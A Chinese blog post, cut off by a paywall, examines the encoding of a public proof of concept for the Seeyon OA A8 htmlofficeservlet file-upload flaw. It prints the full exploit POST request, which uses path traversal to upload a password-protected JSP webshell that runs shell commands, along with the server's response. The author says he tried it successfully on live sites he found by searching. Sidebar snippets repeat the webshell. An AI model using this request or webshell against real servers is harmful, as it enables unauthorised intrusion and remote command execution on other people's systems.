致远OA A8 poc中的编码

最新推荐文章于 2024-03-22 13:37:35 发布
最新推荐文章于 2024-03-22 13:37:35 发布
阅读量3k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/DaoDivDiFang/article/details/93906185

从昨天就有这个poc的信息,其实我对web并不关心。今天又被刷屏了,有的说能利用,有的不能,所以看了下。

给出的poc如下:

POST /seeyon/htmlofficeservlet HTTP/1.1
Content-Length: 1119
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host:xxxx
Pragma: no-cache

DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce

 

搜索了使用这个OA的,找到几个域名,因为我也是从新闻里听来的,所以细节都不清楚。尝试使用域名替换后,还真成功了。

结合内容和FILENAME字段,猜测应该是把post的内容保存成文件到服务器。
而返回包中F:\upload\taohongTemp…\ApacheJetspeed\webapps\seeyon\test123456.jsp,猜测这就是保存的文件名,应该是利用路径穿越,所以…\ApacheJetspeed\webapps\seeyon\test123456.jsp应该就是FILENAME的明文。密文:qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6

对比发现qfTd qfTd qfTd 和 …\ …\ …\ 似乎存在某种关系。三个字符变成4个字符,猜测有可能是base64,明文53个字符、密文72个字符,刚好对应上,结合其他几个字段,猜测6和=的作用类似。

HTTP/1.1 200 
Set-Cookie: JSESSIONID=E8A1A625F5FD3584D920DCABBE28A9B1; Path=/seeyon; HttpOnly
Date: Thu, 27 Jun 2019 10:41:16 GMT
Server: SY8045
Content-Length: 1247

DBSTEP V3.0     386             131             666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
CLIENTIP=wLw5wLK3qUKsz7uEzg66
java.io.FileNotFoundException: F:\upload\taohongTemp\..\..\..\ApacheJetspeed\webapps\seeyon\test123456.jsp (ϵͳÕÒ²»µ½Ö¸¶¨µÄ·¾¶¡£)<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equal
最低0.47元/天 解锁文章

200万优质内容无限畅学
致远OA协同管理软件无需登录getshell
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
08-08 818
一个男子汉,老守在咱村那个土圪崂里,又有什么意思?人就得闯世事!安安稳稳活一辈子,还不如痛痛快快甩打几下就死了!即使受点磨难,只要能多经一些世事,死了也不后悔!
2021 HW —— 简单过程-致远OA
战神/calmness的博客
05-09 852
简述 影响 致远A8-V5协同管理软件 V6.1sp1 致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3 致远A8+协同管理软件V7.1 过程 <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line.
POC编写指南
03-27
转载自Medici.Yan,以真实案例为背景,针对当下主流的漏洞来分析漏洞,并且一步一步编写对应的 PoC
H264/AVC 解码时POC的计算
RRRR_ChiAn的博客
02-09 1147
POC用于标识图像的播放顺序,同时还用于在对帧间预测片解码时,标记参考图像的初始图象序号,表明下列情况下帧或场之间的图像序号差别:使用直接预测模式的运动矢量推算时;B片中使用固有模式加权预测时;解码器一致性检查时。 264对每个编码帧有两个图像序列号,分别成为顶场序列号(TopFieldOrderCnt)和底场序列号(BottomFieldOrderCnt)。这两个序列号分别指明了相应的顶场/底场相对于前一个IDR图像(或解码顺序中前一个包含memory_management_control_operat
H.264/AVC学习-POC计算
qq_42139383的博客
04-01 2458
POC(picture order counts)用来表示解码帧显示顺序,当码流中存在B帧时,解码顺序和显示顺序不一样,视频帧显示时需要根据POC重排顺序,否则会出现跳帧、画面不连贯。 比如,对于IPBB这项顺序的视频序列,解码顺序为 I-P-B-B,但它的显示顺序为 I-B-B-P。 1.基本概念 对于H.264的码流,需要计算POC包括三种:coded frame(编码帧), coded field(编码场)和complementary field pair(互补参考场对),每种类型的POC都由 Top
致远OA A8 status.jsp 信息泄露POC批量验证
最新发布
布啦啦
03-22 1688
漏洞名称:致远OA A8 status.jsp 信息泄露。
lhhxs#poc#致远OA A8-v5 无视验证码撞库1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
himay1#Penetration_Testing_POC#致远OA_A8_getshell_0day1
07-25
漏洞简介POC实现代码如下:Wednesday, 26 June 2019python3 版本import rereturn 0return 0return s
致远OA远程命令POC.txt
07-03
致远A8-OA 0day POC 漏洞情况: 访问 /seeyon/htmlofficeservlet 出现 DBSTEP V3.0 0 21 0 htmoffice operate err '''
HW漏洞集合(三)-seeyon&yonyou-yaml版
HWHXY的博客
03-31 2777
HW漏洞集合(三)-yaml版 link:应用安全 - 工具 | 框架 - 致远OA - 漏洞汇总 21. seeyon A6 sqli注入 补充说明:A6的注入点有很多,还是汇总到一个poc里面吧,感觉都是比较老的注入点了 name: poc-yaml-seeyon-A6-sqli set: rand: randomInt(200000000, 210000000) groups: poc1: - method: GET path: /HJ/iSignatureHtmlServ
致远OA3.0发布文档
01-13
致远OA3.0发布文档
致远OA A8 htmlofficeservlet 任意文件上传漏洞 漏洞复现
Boom!脑洞大爆炸的博客
11-11 7862
致远OA A8 htmlofficeservlet 任意文件上传漏洞 漏洞复现
致远A8_0day_反序列化(9月20日蓝队捕捉)
逗比大师的博客
09-20 243
2020年9月20日00:00左右,蜜罐设备告警发现攻击,溯源后,于全流量设备上捕捉到如下请求包 POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1 Host: x.x.x.x Connecti......
Ladon旁站C段扫描资产信息(网页标题、中间件Banner)
K8哥哥
01-24 909
WebScan 用法: Ladon target WebScan 使用WebScn、PortScan、WhatCms等模块均可收集C段、B段、A段资产信息,如本文需要获取常见Web中间件Banner,所以只使用了WebScan进行收集信息 ### 网站Banner 用于自己的Web服务器Banner修改迷惑黑客的扫描器,如把IIS的Banner改为Apache (Ubuntu 18) 黑客将误以为您的PHP站点架设在Linux机器上。若没有其它信息辅助判断,他可能直接放弃攻击您的网站,或者浪费很多时间在Li
Windows 上将Tomcat 8 安装为系统服务
weixin_34366546的博客
08-04 233
第一部分 应用场景 需要服务器上Tomcat不显示启动窗口 需要服务器上Tomcat开机自启动 。。。 第二部分 配置过程 一、修改配置文件 1 {Tomcat_HOME}/bin/service.bat (1)在文件头部增加 JDK & TOMCAT 目录 & 显示名 (2)在中部修改服务名 其中 Tomcat8045-1 为要注册的服务名(如果不...
如何在Linux上搭建VisualSVN Server(svn服务端)
热门推荐
oYuanFen123456789的专栏
03-18 1万+
系统环境说明如下:本文是以 CentOs6.5系统、subversion-1.6.11-15.el6_7.x86_64 为例 1、检查是否安装了低版本的SVN [root@VPIN ~]# rpm -qa | grep subversion 如果已安装SVN,则会返回版本信息,如:subversion-1.6.11-9.el6_4.i686 卸载旧版
HEVC 中的GOP/POC参数
haima1998的专栏
04-11 9054
转自:http://ms.youkuaiyun.com/share/24D39005B0584987A6AF99E6C39A4E4C_1_IPHONE_APP Pre HEVC学习笔记系列目录 GOP一直没有理清楚,现在记笔记总结一下现有的理解和遇到的问题。有错误请指正。 GOP 视频序列由若干时间连续的图像构成,在对其进行压缩时,先将视频序列分割为若干个小的图像组(G
POC和frame_num的概念
dfhg54的博客
03-16 1199
编码顺序、frame_num和POC_chinabinlang的博客-优快云博客 注意,H264码流的输出顺序是编码顺序,所以在编码B帧的时候,由于B是双向预测,需要先编码后面编码帧P/I,这时候先输出I/P,后面才有B帧,我们在解码段拿到相应的I/P帧后,不能马上丢到buffer list里面,还需要等待后面的B帧,解码B帧后再reorder.所以相应产生了两个参数。poc,frame_num,这两个元素在slice级输出POC,和frame_num的概念: POC picture order c..
应用安全-web安全-WebShell整理
weixin_30865427的博客
06-27 586
shellcode.aspx <%@ Page Language="C#" AutoEventWireup="true" Inherits="System.Web.UI.Page" %> <%@ Import Namespace="System" %> <%@ Import Namespace="System.Runtime.Int...
致远OA系统安全漏洞分析及POC
在这个案例中,"致远OA远程命令POC" 指的是针对致远A8-OA办公自动化系统的一个0day漏洞的证明。0day漏洞是指软件厂商尚未发现或发布补丁的安全漏洞,因此对于攻击者来说,这类漏洞具有极高的价值,因为他们可以利用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值